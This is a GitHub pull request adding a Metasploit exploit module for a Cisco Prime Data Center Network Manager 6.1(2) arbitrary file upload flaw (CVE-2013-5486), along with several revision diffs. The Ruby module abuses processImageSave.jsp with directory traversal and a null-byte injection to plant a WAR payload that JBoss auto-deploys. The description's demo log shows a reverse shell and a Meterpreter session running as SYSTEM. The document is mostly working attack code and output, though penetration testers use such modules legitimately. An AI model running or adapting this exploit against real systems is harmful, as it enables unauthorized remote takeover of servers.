### PR TITLE
Add module for ZDI-13-254

### DIFF
--- a/modules/exploits/multi/http/cisco_dcnm_upload.rb
+++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb
@@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
 
-    10.times do
+    attempts.times do
       select(nil, nil, nil, 2)
 
       # Now make a request to trigger the newly deployed war

--- a/modules/exploits/multi/http/cisco_dcnm_upload.rb
+++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb
@@ -98,6 +98,8 @@ class Metasploit3 < Msf::Exploit::Remote
     elsif res.code == 200 and
         res.body.to_s =~ /Data Center Network Manager/
       return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Safe
     end
 
     if version =~ /6.1/

--- a/modules/exploits/multi/http/cisco_dcnm_upload.rb
+++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb
@@ -31,8 +31,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'References'  =>
         [
           [ 'CVE', '2013-5486'],
-          [ 'OSVDB', '97425' ],
-          [ 'ZDI', '13-255' ],
+          [ 'OSVDB', '97426' ],
+          [ 'ZDI', '13-254' ],
           [ 'URL', 'http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130918-dcnm' ]
         ],
       'Privileged'  => true,

--- a/modules/exploits/multi/http/cisco_dcnm_upload.rb
+++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb
@@ -1,0 +1,142 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Cisco Prime Data Center Network Manager Arbitrary File Upload',
+      'Description' => %q{
+        This module exploits a code execution flaw in Cisco Data Center Network Manager. The
+        vulnerability exists on the processImageSave.jsp, which can be abused through a directory
+        traversal and a null byte injection to upload arbitrary files. The autodeploy JBoss
+        application server feature is used to achieve remote code execution. This module has been
+        tested successfully on Cisco Prime Data Center Network Manager 6.1(2) on Windows 2008 R2
+        (64 bits).
+      },
+      'Author'       =>
+        [
+          'rgod <rgod[at]autistici.org>', # Vulnerability discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2013-5486'],
+          [ 'OSVDB', '97425' ],
+          [ 'ZDI', '13-255' ],
+          [ 'URL', 'http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130918-dcnm' ]
+        ],
+      'Privileged'  => true,
+      'Platform'    => 'java',
+      'Arch'        => ARCH_JAVA,
+      'Targets'     =>
+        [
+          [ 'Cisco DCNM 6.1(2) / Java Universal',
+            {
+              'AutoDeployPath' => "../../../../../deploy",
+              'CleanupPath'    => "../../jboss-4.2.2.GA/server/fm/deploy"
+            }
+          ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Sep 18 2013'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Path to Cisco DCNM', '/'])
+      ], self.class)
+  end
+
+  def upload_file(location, filename, contents)
+    res = send_request_cgi(
+      {
+        'uri'         => normalize_uri(target_uri.path, "cues_utility", "charts", "processImageSave.jsp"),
+        'method'      => 'POST',
+        'encode_params' => false,
+        'vars_post'   =>
+          {
+            "mode"     => "save",
+            "savefile" => "true",
+            "chartid"  => "#{location}/#{filename}%00",
+            "data"     => Rex::Text.uri_encode(Rex::Text.encode_base64(contents))
+          }
+      })
+
+    if res and res.code == 200 and res.body.to_s =~ /success/
+      return true
+    else
+      return false
+    end
+  end
+
+  def check
+    version = ""
+
+    res = send_request_cgi({
+      'url'    => target_uri.to_s,
+      'method' => 'GET'
+    })
+
+    if res and
+        res.code == 200 and
+        res.body.to_s =~ /Data Center Network Manager/ and
+        res.body.to_s =~ /<div class="productVersion">Version: (.*)<\/div>/
+      version = $1
+      print_status("Cisco Primer Data Center Network Manager version #{version} found")
+    else
+      return Exploit::CheckCode::Safe
+    end
+
+    if version =~ /6.1/
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    app_base = rand_text_alphanumeric(4+rand(32-4))
+
+    # By default uploads land here: C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\tmp\deploy\tmp3409372432509144123dcm-exp.war\cues_utility\charts
+    # Auto deploy dir is here C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\deploy
+    # Sessions pwd is here C:\Program Files\Cisco Systems\dcm\fm\bin
+    war = payload.encoded_war({ :app_name => app_base }).to_s
+    war_filename = "#{app_base}.war"
+    war_location = target['AutoDeployPath']
+
+    print_status("#{peer} - Uploading WAR file #{war_filename}...")
+    res = upload_file(war_location, war_filename, war)
+
+    if res
+      register_files_for_cleanup("#{target['CleanupPath']}/#{war_filename}")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Failed to upload the WAR payload")
+    end
+
+    10.times do
+      select(nil, nil, nil, 2)
+
+      # Now make a request to trigger the newly deployed war
+      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
+      res = send_request_cgi(
+        {
+          'uri'    => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
+          'method' => 'GET'
+        })
+      # Failure. The request timed out or the server went away.
+      break if res.nil?
+      # Success! Triggered the payload, should have a shell incoming
+      break if res.code == 200
+    end
+  end
+
+end

--- a/modules/exploits/multi/http/cisco_dcnm_upload.rb
+++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb
@@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
       return Exploit::CheckCode::Safe
     end
 
-    if version =~ /6.1/
+    if version =~ /6\.1/
       return Exploit::CheckCode::Vulnerable
     end
 
@@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Remote
           'method' => 'GET'
         })
       # Failure. The request timed out or the server went away.
-      break if res.nil?
+      fail_with(Failure::TimeoutExpired, "#{peer} - The request timed out or the server went away.") if res.nil?
       # Success! Triggered the payload, should have a shell incoming
       break if res.code == 200
     end

--- a/modules/exploits/multi/http/cisco_dcnm_upload.rb
+++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb
@@ -86,14 +86,18 @@ class Metasploit3 < Msf::Exploit::Remote
       'method' => 'GET'
     })
 
-    if res and
-        res.code == 200 and
+    unless res
+      return Exploit::CheckCode::Unknown
+    end
+
+    if res.code == 200 and
         res.body.to_s =~ /Data Center Network Manager/ and
         res.body.to_s =~ /<div class="productVersion">Version: (.*)<\/div>/
       version = $1
       print_status("Cisco Primer Data Center Network Manager version #{version} found")
-    else
-      return Exploit::CheckCode::Safe
+    elsif res.code == 200 and
+        res.body.to_s =~ /Data Center Network Manager/
+      return Exploit::CheckCode::Detected
     end
 
     if version =~ /6.1/

--- a/modules/exploits/multi/http/cisco_dcnm_upload.rb
+++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb
@@ -52,7 +52,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'Path to Cisco DCNM', '/'])
+        OptString.new('TARGETURI', [true, 'Path to Cisco DCNM', '/']),
+        OptInt.new('ATTEMPTS', [true, 'The number of attempts to execute the payload (auto deployed by JBoss)', 10])
       ], self.class)
   end
 
@@ -110,6 +111,9 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
+    attempts = datastore['ATTEMPTS']
+    fail_with(Failure::BadConfig, "#{peer} - Configure 1 or more ATTEMPTS") unless attempts > 0
+
     app_base = rand_text_alphanumeric(4+rand(32-4))
 
     # By default uploads land here: C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\tmp\deploy\tmp3409372432509144123dcm-exp.war\cues_utility\charts
@@ -127,6 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote
     else
       fail_with(Failure::Unknown, "#{peer} - Failed to upload the WAR payload")
     end
+
 
     10.times do
       select(nil, nil, nil, 2)


### PR DESCRIPTION
- Verification
- [x] Install windows 2008 r2 64 bits 
- [x] Install Cisco Prime Data Center Network Manager 6.1(2) (64 bits) (if you need ask me for installer if need to test this pr)
- [x] Launch msfconsole, use this module like in the DEMO, should enjoy sessions
- DEMO

```
msf exploit(cisco_dcnm_upload) > check

[*] Cisco Primer Data Center Network Manager version 6.1(2) found
[+] The target is vulnerable.
msf exploit(cisco_dcnm_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.137:80 - Uploading WAR file YHjHVQAmvTdpaUdKmtK7elwYIdh.war...
[*] 192.168.172.137:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.172.137:80 - Attempting to launch payload in deployed WAR...
[*] Sending stage (30355 bytes) to 192.168.172.137
[*] Meterpreter session 8 opened (192.168.172.1:4444 -> 192.168.172.137:53989) at 2013-11-29 23:09:47 -0600
[+] Deleted ../../jboss-4.2.2.GA/server/fm/deploy/YHjHVQAmvTdpaUdKmtK7elwYIdh.war

meterpreter > getuid
Server username: SYSTEM
meterpreter > sysinfo
Computer    : WIN-9OJ3V46B3QH
OS          : Windows Server 2008 R2 6.1 (amd64)
Meterpreter : java/java
meterpreter > exit
```
